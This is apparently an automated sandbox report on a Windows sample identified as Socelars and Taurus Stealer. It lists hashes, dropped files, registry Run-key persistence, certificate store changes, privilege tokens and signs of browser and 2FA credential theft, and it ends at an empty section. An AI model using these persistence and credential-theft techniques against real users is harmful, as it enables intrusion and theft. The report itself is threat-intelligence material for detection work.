Malware Analysis Report

2024-10-19 02:35

Sample ID 220206-qfqr8aadf7
Target 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
SHA256 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c
Tags
socelars taurus discovery persistence spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c

Threat Level: Known bad

The file 45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c was found to be: Known bad.

Malicious Activity Summary

socelars taurus discovery persistence spyware stealer trojan upx

Socelars Payload

Socelars

Taurus Stealer

Taurus Stealer Payload

Executes dropped EXE

UPX packed file

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Accesses 2FA software files, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Runs ping.exe

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-06 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-06 13:12

Reported

2022-02-06 13:15

Platform

win7-en-20211208

Max time kernel

153s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

Signatures

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Taurus Stealer

trojan stealer taurus

Taurus Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe" C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 701611bf631bd801 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value elided) C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "350921742" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D9281271-8756-11EC-A514-46595837F587} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f302f7a020b975438ea1f1f995ba9783000000000200000000001066000000010000200000001a4e9f3712eb5de889121cd3fffd5cded3ca6f3942336b235f9f9a9bd2e6fca7000000000e80000000020000200000000cb3722f65383d4e8feddd84bc0edba9fe078e93b7b05d788aa08fda438a5cad20000000decaf1376415456119728aa1127d17990c580927efc25e5a2f9fe33c1ce3746540000000f264937b1c573bbcda57973a59d156421c2361a24fb562175be3d552a2e07c5fdd76f701c9edc622adced6f5bec400a287d6963be8d16d635b1652edbf88bc04 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D925B111-8756-11EC-A514-46595837F587} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary value elided) C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95 C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (binary value elided) C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
